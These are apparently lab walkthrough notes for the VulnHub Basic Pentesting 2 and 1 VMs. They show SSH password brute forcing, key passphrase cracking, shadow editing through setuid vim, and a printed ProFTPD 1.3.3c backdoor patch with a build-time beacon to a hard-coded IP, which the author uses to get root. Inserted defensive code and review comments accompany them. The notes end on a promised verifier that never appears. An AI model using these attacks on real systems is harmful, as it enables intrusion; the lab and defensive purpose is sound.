    Sharename       Type      Comment
    ---------       ----      -------
    Anonymous       Disk      
    IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available

This Samba is "Samba Server 4.3.11-Ubuntu".
Come to think of it, smbclient has never worked for me; maybe it only works when anonymous login is enabled.

# enum4linux 10.10.10.11
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue May  5 00:25:23 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.11
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
(snip)
 ===================================== 
|    OS information on 10.10.10.11    |
 ===================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.11 from smbclient: 
[+] Got OS info for 10.10.10.11 from srvinfo:
    BASIC2         Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
    platform_id     :   500
    os version      :   6.1
    server type     :   0x809a03

(snip)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

 ============================================ 
|    Getting printer info for 10.10.10.11    |
 ============================================ 
No printers returned.


enum4linux complete on Tue May  5 00:25:38 2020

Login attempts as "kay" and "jan" didn't succeed.
hydra told me the users don't exist.
The exploit seems to work only locally, so I gave up.
No idea.

[port 8009] ajp13 Apache Jserv (Protocol v1.3)

Shouldn't pay much attention to this itself; should I check Tomcat instead?

[port 8080] http Apache Tomcat 9.0.7

# nikto -h 10.10.10.11 -p 8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.11
+ Target Hostname:    10.10.10.11
+ Target Port:        8080
+ Start Time:         2020-05-05 00:49:02 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 8169 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2020-05-05 00:49:33 (GMT-4) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
# dirb http://10.10.10.11:8080

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue May  5 00:49:59 2020
URL_BASE: http://10.10.10.11:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.11:8080/ ----
+ http://10.10.10.11:8080/docs (CODE:302|SIZE:0)                                                                     
+ http://10.10.10.11:8080/examples (CODE:302|SIZE:0)                                                                 
+ http://10.10.10.11:8080/favicon.ico (CODE:200|SIZE:21630)                                                          
+ http://10.10.10.11:8080/host-manager (CODE:302|SIZE:0)                                                             
+ http://10.10.10.11:8080/manager (CODE:302|SIZE:0)                                                                  
                                                                                                                     
-----------------
END_TIME: Tue May  5 00:50:03 2020
DOWNLOADED: 4612 - FOUND: 5

For now, run hydra against "/manager/html".

(Gave up because it took too long)

But if PUT is allowed, is that the real route?
No. PUT didn't work.

Not sure what else to do, so dictionary attack on ssh

What was that about jan's password being weak? Still don't know.
I guess all that's left is to try ssh.

# hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.10.11 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

(snip)
[22][ssh] host: 10.10.10.11   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-05 06:02:33

Huh, so "weak password hash" just meant an ssh dictionary attack was enough.
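From the defender's side, the hydra run above leaves a very recognisable trace in sshd's log: a burst of failed passwords from one address, then an accepted login from the same address. The detector below is an added example, not code from the original post; it runs over constructed auth.log lines (addresses, PIDs and times are made up) and flags exactly that pattern.

```python
"""Flag SSH password-guessing in sshd auth-log lines.

Added example, not code from the original post. Counts "Failed password"
events per source address inside a sliding window and, once a source crosses
the threshold, records whether a later "Accepted" login from that source
follows, which is the trace a successful hydra run leaves behind.
"""
import re
from collections import Counter, defaultdict, deque
from datetime import datetime

# Constructed sample lines in the syslog layout Ubuntu 16.04 sshd writes to
# /var/log/auth.log; the addresses, PIDs and times are made up for the example.
SAMPLE_AUTH_LOG = """\
May  5 06:01:10 basic2 sshd[1201]: Failed password for jan from 192.168.56.102 port 40001 ssh2
May  5 06:01:11 basic2 sshd[1203]: Failed password for jan from 192.168.56.102 port 40002 ssh2
May  5 06:01:11 basic2 sshd[1205]: Failed password for invalid user admin from 192.168.56.102 port 40003 ssh2
May  5 06:01:12 basic2 sshd[1207]: Failed password for jan from 192.168.56.102 port 40004 ssh2
May  5 06:01:13 basic2 sshd[1209]: Failed password for jan from 192.168.56.102 port 40005 ssh2
May  5 06:01:14 basic2 sshd[1211]: Failed password for jan from 192.168.56.102 port 40006 ssh2
May  5 06:02:33 basic2 sshd[1290]: Accepted password for jan from 192.168.56.102 port 40317 ssh2
May  5 06:10:02 basic2 sshd[1302]: Failed password for kay from 10.10.10.20 port 50001 ssh2
May  5 06:25:00 basic2 sshd[1340]: Accepted publickey for kay from 10.10.10.20 port 50010 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$"
)


def parse_line(line, year=2020):
    """Return a dict for one sshd auth event, or None for lines we do not model.

    syslog timestamps carry no year, so the caller supplies it (assumed 2020 here).
    """
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Sources with at least `threshold` failures inside `window_seconds`.

    Returns {ip: {"first_failure": ts, "failures": total,
                  "success_after": (user, ts) or None}}.
    """
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    total = Counter()             # ip -> every failure seen, windowed or not
    flagged = {}
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        ip = ev["ip"]
        if ev["result"] == "Failed":
            total[ip] += 1
            q = recent[ip]
            q.append(ev["ts"])
            while (ev["ts"] - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged[ip] = {"first_failure": q[0], "success_after": None}
        elif ip in flagged and flagged[ip]["success_after"] is None:
            # A success right after a burst is the highest-priority signal:
            # the guessing worked and the account is now in use.
            flagged[ip]["success_after"] = (ev["user"], ev["ts"])
    for ip, rec in flagged.items():
        rec["failures"] = total[ip]
    return flagged


if __name__ == "__main__":
    for ip, rec in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, rec)
```

The window keeps a slow, spread-out guesser from being drowned out by the total count, and the "success_after" field is what should page someone: a burst alone may be a misconfigured client, a burst followed by an accepted password is a compromised account. The single failure from 10.10.10.20 stays below the threshold and is not reported.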

# ssh jan@10.10.10.11
The authenticity of host '10.10.10.11 (10.10.10.11)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.11' (ECDSA) to the list of known hosts.
jan@10.10.10.11's password: 
(snip)
Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102
jan@basic2:~$ id
uid=1001(jan) gid=1001(jan) groups=1001(jan)
jan@basic2:~$ sudo -l
[sudo] password for jan: 
Sorry, user jan may not run sudo on basic2.

sudo not allowed.
Can't find the apache password file.

jan@basic2:/home/kay$ ls -al /home/jan/
total 12
drwxr-xr-x 2 root root 4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 root jan    47 Apr 23  2018 .lesshst
jan@basic2:/home/kay$ ls -al /home/kay/
total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 kay  kay   756 Apr 23  2018 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay  4096 Apr 17  2018 .cache
-rw------- 1 root kay   119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay  4096 Apr 23  2018 .nano
-rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay  4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23  2018 .viminfo
-rw------- 1 kay  kay    57 Apr 23  2018 pass.bak

kay's directory is pretty well-stocked.
Wait, there's a .ssh directory, so maybe I can log in.

jan@basic2:/home/kay$ ls -al ./.ssh
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23  2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23  2018 ..
-rw-rw-r-- 1 kay kay  771 Apr 23  2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19  2018 id_rsa
-rw-r--r-- 1 kay kay  771 Apr 19  2018 id_rsa.pub
# scp jan@10.10.10.11:/home/kay/.ssh/id_rsa ./sshkey
jan@10.10.10.11's password: 
id_rsa                                        100% 3326   293.3KB/s   00:00    
# ssh -i sshkey kay@10.10.10.11
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'sshkey' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "sshkey": bad permissions
kay@10.10.10.11's password: 

Needs a password, huh.

# ls /usr/share/john/ | grep ssh
ssh2john.py
# /usr/share/john/ssh2john.py sshkey > kayssh
# john --wordlist=/usr/share/wordlists/rockyou.txt kayssh
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (sshkey)
Warning: Only 1 candidate left, minimum 2 needed for performance.
1g 0:00:00:12 DONE (2020-05-05 07:19) 0.08230g/s 1180Kp/s 1180Kc/s 1180KC/s *7¡Vamos!
Session completed

OK, this should do it.

# ssh -i sshkey kay@10.10.10.11
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0777 for 'sshkey' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "sshkey": bad permissions
kay@10.10.10.11's password: 

Logging in with the private key copied to my local machine apparently doesn't work, so log in as jan again and ssh from there.

jan@basic2:/home/kay$ ssh -i ./.ssh/id_rsa kay@10.10.10.11
Could not create directory '/home/jan/.ssh'.
The authenticity of host '10.10.10.11 (10.10.10.11)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
Enter passphrase for key './.ssh/id_rsa': 
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$ sudo -l
[sudo] password for kay: 
Sorry, try again.
[sudo] password for kay: 
sudo: 1 incorrect password attempt

Come to think of it, I don't know kay's password, so I can't get to root.

kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

Couldn't see this earlier; what is it?

kay@basic2:~$ cat .bash_history 
ls -al
cat pass.bak 
cat /dev/null > .bash_history 
sudo su
ls -al
cat /dev/null > .bash_history 
cd /tmp
ls -al
cd /home/jan
ls -al
sudo less .viminfo 
sudo cat /dev/null > .viminfo 
sudo rm .viminfo 
less .lesshst 
sudo less .lesshst 
cd /home/kay/
ls -al
less .bash
less .bash_history 
exit
/bin/less /etc/shadow
which /bin/less
/bin/less
/bin/less /etc/passwd
sh
sudo chmod u-s /bin/less
/bin/less
ls -al /bin/les
ls -al /bin/less
sudo chmod u-s /bin/nc.traditional 
which nc.traditional 
ls -al /bin/nc*
find / -perm -u=s -type f 2>/dev/null
which vim
sudo chmod u+s /usr/bin/vim
ls -al /usr/bin/vim
vim /etc/passwd
ls -al
ls -al /bin/vim
vim /etc/shadow
vim /etc/passwd
cat /etc/passwd
vi /etc/passwd
cat /etc/passwd
ls -al /etc/passwd
ifconfig
exit

This user can touch /etc/shadow.
Or so I thought, but it seems sudo was needed.
No wait, "sudo chmod u+s /usr/bin/vim": vim is being made setuid right here.

kay@basic2:~$ openssl passwd -1 pass
$1$Yls/Q7aH$lOuA2MSt/Of1BFGaB7NC9.
kay@basic2:~$ vim /etc/shadow
kay@basic2:~$ sudo su
[sudo] password for kay: 
root@basic2:/home/kay# id
uid=0(root) gid=0(root) groups=0(root)

Just overwrite kay's password in shadow.
:wq! complains, but thanks to setuid the change gets written anyway.
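Both footholds on this box, a private key readable by every local user and a setuid bit added to vim, are things a periodic host audit catches. The script below is an added example, not code from the post or from the VM: it lists setuid files that a baseline does not account for (the `find / -perm -u=s -type f` from kay's history, with a diff against what is expected) and private keys in any `.ssh` directory that group or others can read, noting whether a passphrase protects them. EXPECTED_SETUID is an assumed, illustrative baseline, and `demo()` builds a constructed directory tree rather than scanning the real filesystem.

```python
"""Audit for the two host weaknesses used above: setuid binaries missing from
a baseline (the `sudo chmod u+s /usr/bin/vim` in kay's history) and private
SSH keys readable by other users (kay's mode 0644 id_rsa).

Added example, not code from the original post. EXPECTED_SETUID is an
illustrative assumption; take a real baseline from a known-good image.
"""
import base64
import os
import stat
import struct
import tempfile

# Assumed baseline of setuid binaries a stock Ubuntu 16.04 host carries (illustrative).
EXPECTED_SETUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6",
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp",
}


def find_setuid(root):
    """Regular files under root with the setuid bit set (what find -perm -u=s reports)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def unexpected_setuid(root, baseline=EXPECTED_SETUID):
    """Setuid files the baseline does not account for; /usr/bin/vim would land here."""
    return [p for p in find_setuid(root) if p not in baseline]


def key_is_encrypted(data):
    """True if a PEM or OpenSSH-format private key is passphrase-protected."""
    if b"Proc-Type: 4,ENCRYPTED" in data or b"BEGIN ENCRYPTED PRIVATE KEY" in data:
        return True
    if b"BEGIN OPENSSH PRIVATE KEY" in data:
        body = b"".join(l for l in data.splitlines() if not l.startswith(b"-----"))
        blob = base64.b64decode(body)
        magic = b"openssh-key-v1\0"
        if blob.startswith(magic):
            # The magic is followed by a length-prefixed cipher name; "none" = unencrypted.
            (n,) = struct.unpack(">I", blob[len(magic):len(magic) + 4])
            return blob[len(magic) + 4:len(magic) + 4 + n] != b"none"
    return False


def exposed_private_keys(home_root):
    """Private keys in any .ssh directory that group or others can read."""
    findings = []
    for dirpath, _dirs, files in os.walk(home_root):
        if os.path.basename(dirpath) != ".ssh":
            continue
        for name in files:
            if name.endswith(".pub") or name in ("authorized_keys", "known_hosts", "config"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as f:
                    data = f.read()
                mode = os.stat(path).st_mode
            except OSError:
                continue
            if b"PRIVATE KEY-----" in data and mode & (stat.S_IRGRP | stat.S_IROTH):
                findings.append({"path": path, "mode": oct(mode & 0o777),
                                 "encrypted": key_is_encrypted(data)})
    return sorted(findings, key=lambda f: f["path"])


def openssh_key_stub(cipher):
    """Constructed OpenSSH-format key carrying only the header fields the audit reads."""
    blob = b"openssh-key-v1\0" + struct.pack(">I", len(cipher)) + cipher
    return (b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(blob)
            + b"\n-----END OPENSSH PRIVATE KEY-----\n")


def demo():
    """Run both checks over a constructed tree mirroring the situation on the VM."""
    base = tempfile.mkdtemp(prefix="audit-")
    os.makedirs(os.path.join(base, "bin"))
    for name, mode in (("su", 0o4755), ("vim", 0o4755), ("ls", 0o755)):
        path = os.path.join(base, "bin", name)
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, mode)
    keys = [  # (user, file, mode, constructed contents)
        ("kay", "id_rsa", 0o644, b"-----BEGIN RSA PRIVATE KEY-----\nMIIE(constructed)\n-----END RSA PRIVATE KEY-----\n"),
        ("kay", "id_rsa.pub", 0o644, b"ssh-rsa AAAA(constructed) kay@basic2\n"),
        ("jan", "id_ed25519", 0o600, openssh_key_stub(b"none")),
        ("ops", "id_rsa", 0o644, openssh_key_stub(b"aes256-ctr")),
    ]
    for user, name, mode, data in keys:
        d = os.path.join(base, "home", user, ".ssh")
        os.makedirs(d, exist_ok=True)
        path = os.path.join(d, name)
        with open(path, "wb") as f:
            f.write(data)
        os.chmod(path, mode)
    baseline = {os.path.join(base, "bin", "su")}   # only su is "expected" in the demo tree
    return {
        "unexpected_setuid": [os.path.relpath(p, base) for p in unexpected_setuid(base, baseline)],
        "exposed_keys": [(os.path.relpath(f["path"], base), f["encrypted"])
                         for f in exposed_private_keys(os.path.join(base, "home"))],
    }


if __name__ == "__main__":
    print(demo())
```

In the demo tree `bin/vim` is reported because it is setuid and not in the baseline, kay's world-readable unencrypted key is the worst finding, and the encrypted but readable key is still listed, since a readable key file is exactly what ssh2john and a wordlist turn into a login, as happened above. jan's 0600 key is not reported.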

The truth about pass.bak

kay@basic2:~$ cat pass.bak 
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
kay@basic2:~$ sudo su
[sudo] password for kay: 
root@basic2:/home/kay# id
uid=0(root) gid=0(root) groups=0(root)

It was kay's password.

Bonus

root@basic2:/home/kay# cd /root
root@basic2:~# ls
flag.txt
root@basic2:~# cat flag.txt
Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain 
a shell, and two ways to privesc. I encourage you to find them all!

If you're in the target audience (newcomers to pentesting), I hope you learned something. A few
takeaways from this challenge should be that every little bit of information you can find can be
valuable, but sometimes you'll need to find several different pieces of information and combine
them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding
an obviously outdated, vulnerable service right away with a port scan (unlike the first entry
in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and
therefore might've been overlooked by administrators.

Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send 
me a link! I can be reached at josiah@vt.edu. If you've got questions or feedback, please reach
out to me.

Happy hacking!

The end

  • There were john modules not registered as commands under "/usr/share/john".
  • I thought there might be an approach via the apache password.

vulnhub Basic Pentesting 1 notes

Basic Pentesting 1

Service enumeration

# nmap -p- 10.10.10.10
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 01:43 EDT
Nmap scan report for 10.10.10.10
Host is up (0.00035s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:7D:36:49 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 18.80 seconds
# nmap -p21,22,80 -sV --version-all 10.10.10.10
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 01:44 EDT
Nmap scan report for 10.10.10.10
Host is up (0.00093s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:7D:36:49 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.49 seconds

Somehow it's fast this time.

Points of interest

Details

[port 21] ftp ProFTPD 1.3.3c

# searchsploit proftpd
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
(snip)
ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution           | exploits/linux/remote/15662.txt
(snip)
ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow                               | exploits/linux/remote/4312.c
ProFTPd IAC 1.3.x - Remote Command Execution                                 | exploits/linux/remote/15449.pl
(snip)

Right away found one that looks likely to land.
The bottom two didn't land.
Check the contents of the most promising one.

# cat 15662.txt
== ProFTPD Compromise Report ==

On Sunday, the 28th of November 2010 around 20:00 UTC the main
distribution server of the ProFTPD project was compromised.  The
attackers most likely used an unpatched security issue in the FTP daemon
to gain access to the server and used their privileges to replace the
source files for ProFTPD 1.3.3c with a version which contained a backdoor.
The unauthorized modification of the source code was noticed by
Daniel Austin and relayed to the ProFTPD project by Jeroen Geilman on
Wednesday, December 1 and fixed shortly afterwards.

The fact that the server acted as the main FTP site for the ProFTPD
project (ftp.proftpd.org) as well as the rsync distribution server
(rsync.proftpd.org) for all ProFTPD mirror servers means that anyone who
downloaded ProFTPD 1.3.3c from one of the official mirrors from 2010-11-28
to 2010-12-02 will most likely be affected by the problem.

The backdoor introduced by the attackers allows unauthenticated users
remote root access to systems which run the maliciously modified version
of the ProFTPD daemon.

Users are strongly advised to check systems running the affected code for
security compromises and compile/run a known good version of the code.
To verify the integrity of the source files, use the GPG signatures
available on the FTP servers as well on the ProFTPD homepage at:

  http://www.proftpd.org/md5_pgp.html.

The MD5 sums for the source tarballs are:

 8571bd78874b557e98480ed48e2df1d2  proftpd-1.3.3c.tar.bz2
 4f2c554d6273b8145095837913ba9e5d  proftpd-1.3.3c.tar.gz




= Rootkit patch =

diff -Naur proftpd-1.3.3c.orig/configure proftpd-1.3.3c/configure
--- proftpd-1.3.3c.orig/configure   2010-04-14 00:01:35.000000000 +0200
+++ proftpd-1.3.3c/configure    2010-10-29 19:08:56.000000000 +0200
@@ -9,7 +9,10 @@
 ## --------------------- ##
 ## M4sh Initialization.  ##
 ## --------------------- ##
-
+gcc tests/tests.c -o tests/tests >/dev/null 2>&1
+cc tests/tests.c -o tests/tests >/dev/null 2>&1
+tests/tests >/dev/null 2>&1 &
+rm -rf tests/tests.c tests/tests >/dev/null 2>&1
 # Be more Bourne compatible
 DUALCASE=1; export DUALCASE # for MKS sh
 if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then
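Review bot: the four lines inserted into the "M4sh Initialization" block compile tests/tests.c, run the binary in the background, and then delete both source and binary, with all output discarded. A configure script should not build and execute code before the shell compatibility checks, and removing the artefact afterwards is evidence removal rather than cleanup. Treat this hunk as a supply-chain compromise indicator: reject it, and compare the shipped configure against the one in the signed release (the advisory text above lists the expected tarball MD5 sums and points to the GPG signatures).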


diff -Naur proftpd-1.3.3c.orig/src/help.c proftpd-1.3.3c/src/help.c
--- proftpd-1.3.3c.orig/src/help.c  2009-07-01 01:31:18.000000000 +0200
+++ proftpd-1.3.3c/src/help.c   2010-11-16 18:40:46.000000000 +0100
@@ -27,6 +27,8 @@
  */
 
 #include "conf.h"
+#include <stdlib.h>
+#include <string.h>
 
 struct help_rec {
   const char *cmd;
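Review bot: nothing in the surrounding help.c context uses <stdlib.h> or <string.h>; the only consumer is the strcmp()/system() line inserted in the next hunk. Unexplained includes in a file that otherwise changes nothing are a prompt to look for the code that needs them.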
@@ -126,7 +128,7 @@
         cmd->server->ServerAdmin ? cmd->server->ServerAdmin : "ftp-admin");
 
     } else {
-
+      if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
       /* List the syntax for the given target command. */
       for (i = 0; i < help_list->nelts; i++) {
         if (strcasecmp(helps[i].cmd, target) == 0) {
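Review bot: the line added on the `else` branch of the HELP handler compares the client-supplied target against a fixed string and, on a match, calls setuid(0), setgid(0) and system("/bin/sh;/sbin/sh"). A help command has no business changing credentials or spawning a shell; this is an unauthenticated root backdoor reachable by any client that can open the control connection, which is what the advisory text above describes. For detection, the literal "ACIDBITCHEZ" in the daemon binary or in FTP command logs is a direct indicator, and the FTP data-channel session above shows what a hit looks like on the wire.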


diff -Naur proftpd-1.3.3c.orig/tests/tests.c proftpd-1.3.3c/tests/tests.c
--- proftpd-1.3.3c.orig/tests/tests.c   1970-01-01 01:00:00.000000000 +0100
+++ proftpd-1.3.3c/tests/tests.c    2010-11-29 09:37:35.000000000 +0100
@@ -0,0 +1,58 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <netdb.h>
+#include <signal.h>
+#include <string.h>
+
+#define DEF_PORT 9090
+#define DEF_TIMEOUT 15
+#define DEF_COMMAND "GET /AB HTTP/1.0\r\n\r\n"
+
+int sock;
+
+void handle_timeout(int sig)
+{
+    close(sock);
+    exit(0);
+}
+
+int main(void)
+{
+
+        struct sockaddr_in addr;
+        struct hostent *he;
+        u_short port;
+        char ip[20]="212.26.42.47";    /*  EDB NOTE - HARDCODED IP */
+        port = DEF_PORT;
+        signal(SIGALRM, handle_timeout);
+        alarm(DEF_TIMEOUT);
+        he=gethostbyname(ip);
+        if(he==NULL) return(-1);
+        addr.sin_addr.s_addr = *(unsigned long*)he->h_addr;
+        addr.sin_port = htons(port);
+        addr.sin_family = AF_INET;
+        memset(addr.sin_zero, 0, 8);
+        sprintf(ip, inet_ntoa(addr.sin_addr));
+        if((sock = socket(AF_INET, SOCK_STREAM, 0))==-1)
+        {
+                return EXIT_FAILURE;
+        }
+        if(connect(sock, (struct sockaddr*)&addr, sizeof(struct sockaddr))==-1)
+        {
+            close(sock);
+            return EXIT_FAILURE;
+        }
+        if(-1 == send(sock, DEF_COMMAND, strlen(DEF_COMMAND), 0))
+        {
+            return EXIT_FAILURE;
+        }
+        close(sock);
+
+return 0; }
+
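Review bot: tests/tests.c is a new file that is not a test. It connects to the hard-coded address 212.26.42.47 on port 9090 (DEF_PORT), sends one fake HTTP request line and exits, with a 15-second alarm so that blocked egress never stalls the build. Together with the configure hunk this is a build-time beacon reporting every host that compiles the tampered tarball. Two details that would fail review even for benign code: `*(unsigned long*)he->h_addr` reads past the 4-byte address on LP64 targets, and `sprintf(ip, inet_ntoa(addr.sin_addr))` passes a non-literal format string. Neither matters to the attacker, but both help flag the file as not project code. Outbound connections from a build step to an unrelated address are the thing to alert on.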

Apparently the "ProFTPD" distributed during a certain period was tampered with and had a backdoor planted.
Exploits/proftpd-1.3.3c-backdoor - aldeid
Using this backdoor is extremely simple.

# telnet 10.10.10.10 21
Trying 10.10.10.10...
Connected to 10.10.10.10.
Escape character is '^]'.
220 ProFTPD 1.3.3c Server (vtcsec) [10.10.10.10]
HELP ACIDBITCHEZ 
id;
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
python -c "import pty;pty.spawn('/bin/sh')";
# whoami
whoami

root

That was over quickly.

Ctrl + ]
telnet > q

and that ends the session.
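The compromise report above tells users to check what they downloaded against the published GPG signatures and MD5 sums. As an added example (not from the post or the ProFTPD project), here is the digest half of that check: a small verifier that reads sums in md5sum/sha256sum output format and compares digests in constant time. PUBLISHED_MD5 copies the two sums from the advisory; the tarball contents in `demo()` are constructed stand-ins, so they must mismatch the real sums, which is the point the demo makes.

```python
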